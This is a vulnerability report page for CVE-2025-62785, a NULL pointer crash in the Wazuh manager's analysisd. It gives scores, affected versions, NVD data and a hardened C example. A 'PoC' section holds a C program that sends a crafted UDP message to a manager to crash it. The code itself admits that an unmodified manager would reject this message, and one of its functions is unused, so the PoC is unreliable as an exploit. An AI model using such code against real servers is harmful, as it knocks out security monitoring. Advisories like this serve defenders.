Security Vulnerability Report
CVE-2025-62785 CVSS 7.5 HIGH

CVE-2025-62785

Published: 2025-10-29 16:15:35
Last Modified: 2025-11-03 19:32:55

Description

Wazuh is a free and open source platform used for threat prevention, detection, and response. The fillData() implementation does not check whether value is NULL before calling os_strdup() on it. A compromised agent can therefore crash analysisd by sending a specially crafted message to the Wazuh manager: any attacker able to craft and send an agent message to the manager can make analysisd crash and become unavailable. The vulnerability is fixed in 4.10.2.

NVD records the weaknesses as CWE-252 (Unchecked Return Value) and CWE-476 (NULL Pointer Dereference). The fix is commit 17f8dc23a6211cbb398a262fcd1b0fe61b0a8eb6 in wazuh/wazuh; the vendor advisory is GHSA-mqpq-pcxc-8259.
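The unchecked-strdup pattern the description refers to, next to a hardened version that drops the message instead of dereferencing NULL, as an added example written for this page (it is not Wazuh project code and does not reproduce the real decoder or the fixing commit). The message layout, the field names "location" and "data", the lookup_field() helper and the xstrdup() stand-in for os_strdup() are all assumptions made for illustration.

```c
/* Added example, not Wazuh code. Models a decoder that copies fields out of
 * an agent message: a lookup that returns NULL for an absent or non-string
 * field (assumed), and the unchecked versus checked way of duplicating it. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Minimal stand-in for a decoded agent message: flat key/value pairs.
 * value == NULL models "field missing or not a string". */
typedef struct {
    const char *key;
    const char *value;
} field_t;

typedef struct {
    const field_t *fields;
    size_t count;
} message_t;

/* Returns the field's string or NULL; NULL is the case fillData() did not check. */
static const char *lookup_field(const message_t *msg, const char *key)
{
    for (size_t i = 0; i < msg->count; i++) {
        if (strcmp(msg->fields[i].key, key) == 0) {
            return msg->fields[i].value;
        }
    }
    return NULL;
}

/* Assumed stand-in for an os_strdup-style helper that aborts on allocation
 * failure. strdup(NULL) is undefined behaviour and in practice a segfault,
 * which is the analysisd crash the advisory describes. */
static char *xstrdup(const char *s)
{
    char *dup = strdup(s);
    if (dup == NULL) {
        perror("strdup");
        exit(EXIT_FAILURE);
    }
    return dup;
}

typedef struct {
    char *location;
    char *data;
} record_t;

/* Vulnerable shape: every value is duplicated without a NULL check.
 * Deliberately never called below; with a missing field it dereferences NULL. */
int fill_data_vulnerable(const message_t *msg, record_t *out)
{
    out->location = xstrdup(lookup_field(msg, "location"));
    out->data = xstrdup(lookup_field(msg, "data"));
    return 0;
}

/* Hardened shape: validate every required field before the first allocation,
 * so a malformed message is rejected (-1) and the daemon keeps running.
 * On failure nothing is allocated and the record is left zeroed. */
int fill_data_hardened(const message_t *msg, record_t *out)
{
    const char *location = lookup_field(msg, "location");
    const char *data = lookup_field(msg, "data");

    out->location = NULL;
    out->data = NULL;
    if (location == NULL || data == NULL) {
        return -1;
    }
    out->location = xstrdup(location);
    out->data = xstrdup(data);
    return 0;
}

void free_record(record_t *rec)
{
    free(rec->location);
    free(rec->data);
    rec->location = NULL;
    rec->data = NULL;
}

/* Constructed sample messages: one well-formed, one with "data" absent. */
static const field_t good_fields[] = { {"location", "syslog"}, {"data", "Oct 29 10:00:00 host test line"} };
static const field_t bad_fields[]  = { {"location", "syslog"}, {"data", NULL} };
const message_t good_message = { good_fields, 2 };
const message_t bad_message  = { bad_fields, 2 };

int main(void)
{
    record_t rec;
    if (fill_data_hardened(&good_message, &rec) == 0) {
        printf("accepted: location=%s data=%s\n", rec.location, rec.data);
        free_record(&rec);
    }
    if (fill_data_hardened(&bad_message, &rec) != 0) {
        printf("rejected: required field missing, daemon keeps running\n");
    }
    return 0;
}
```

The point of the hardened version is ordering: all lookups are validated before any duplication, so a rejected message never leaves a half-filled record to leak or free twice. Swapping in fill_data_vulnerable() for the second call reproduces the crash class, which is why it is left uncalled.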

CVSS Details

CVSS 3.1 (Primary)
Score: 7.5
Severity: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Exploitability 3.9 / Impact 3.6

CVSS 4.0 (Secondary)
Score: 6.9
Severity: MEDIUM
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

The two ratings differ only in how they weigh a crash of one daemon: 3.1 scores it as high availability impact, 4.0 as low.

Configurations (Affected Products)

cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:* - VULNERABLE
Wazuh < 4.10.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2025-62785 PoC - Malicious Agent Message Triggering NULL pointer dereference
// This PoC demonstrates sending a crafted agent message with NULL value field
// to trigger the vulnerability in Wazuh fillData() function
//
// Note: the JSON layout below is the PoC author's model of an agent message and
// is not taken from the advisory. The manager only processes messages from
// enrolled agents, encrypted with that agent's key (hence "compromised agent" in
// the description); a plaintext datagram like this shows the shape only and is
// not accepted by an unmodified manager.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>       // close()
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>    // inet_pton()

#define WAZUH_MANAGER_IP "192.168.1.100"
#define WAZUH_MANAGER_PORT 1514

// Simulate the vulnerable fillData() behavior
void fillData_exploit(const char* value) {
    // Vulnerable code: os_strdup() called without NULL check
    // In real Wazuh code: char* dup_value = os_strdup(value);
    // This will crash when value is NULL
    printf("Attempting to duplicate: %s\n", value);
    char* dup_value = strdup(value); // This will crash if value is NULL
    printf("Duplicated value: %s\n", dup_value);
    free(dup_value);
}

// Construct malicious agent message with NULL value field
char* construct_malicious_message(void) {
    // JSON message format expected by Wazuh manager
    // The key is having a field with NULL/empty value that triggers the bug
    static char msg[2048];
    snprintf(msg, sizeof(msg),
             "{\"version\":\"Wazuh 4.10.1\",\"type\":\"agent\",\"name\":\"exploit-agent\","
             "\"id\":\"001\",\"data\":{\"timestamp\":\"2025-01-01T00:00:00Z\","
             "\"location\":\"syslog\",\"data_field\":NULL}}"); // NULL value triggers vulnerability
    return msg;
}

int send_exploit(void) {
    int sock = socket(AF_INET, SOCK_DGRAM, 0);
    if (sock < 0) {
        perror("Socket creation failed");
        return -1;
    }

    struct sockaddr_in server_addr;
    memset(&server_addr, 0, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons(WAZUH_MANAGER_PORT);
    if (inet_pton(AF_INET, WAZUH_MANAGER_IP, &server_addr.sin_addr) != 1) {
        perror("Invalid manager address");
        close(sock);
        return -1;
    }

    char* malicious_msg = construct_malicious_message();
    printf("Sending malicious message to Wazuh manager...\n");
    printf("Message: %s\n", malicious_msg);

    ssize_t sent = sendto(sock, malicious_msg, strlen(malicious_msg), 0,
                          (struct sockaddr*)&server_addr, sizeof(server_addr));
    if (sent < 0) {
        perror("Send failed");
        close(sock);
        return -1;
    }

    printf("Malicious message sent successfully.\n");
    printf("Wazuh analysisd should crash due to NULL pointer dereference.\n");
    close(sock);
    return 0;
}

int main(void) {
    printf("=== CVE-2025-62785 Wazuh fillData() NULL Pointer Dereference PoC ===\n");
    printf("Target: Wazuh Manager < 4.10.2\n");
    printf("Vulnerability: fillData() does not check for NULL before os_strdup()\n\n");
    return send_exploit();
}

References

https://github.com/wazuh/wazuh/commit/17f8dc23a6211cbb398a262fcd1b0fe61b0a8eb6 (Patch)
https://github.com/wazuh/wazuh/security/advisories/GHSA-mqpq-pcxc-8259 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-62785",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-29T16:15:34.690",
    "lastModified": "2025-11-03T19:32:54.677",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Wazuh is a free and open source platform used for threat prevention, detection, and response. fillData() implementation does not check whether value is NULL or not before calling os_strdup() on it. A compromised agent can cause a crash of analysisd by sending a specially crafted message to the wazuh manager. An attacker who is able to craft and send an agent message to the wazuh manager can cause analysisd to crash and make it unavailable. This vulnerability is fixed in 4.10.2."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 6.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE",
            "vulnAvailabilityImpact": "LOW",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-252"},
          {"lang": "en", "value": "CWE-476"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "4.10.2",
                "matchCriteriaId": "B541CA8F-6E0F-4098-9463-3B713ED4F463"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/wazuh/wazuh/commit/17f8dc23a6211cbb398a262fcd1b0fe61b0a8eb6",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/wazuh/wazuh/security/advisories/GHSA-mqpq-pcxc-8259",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}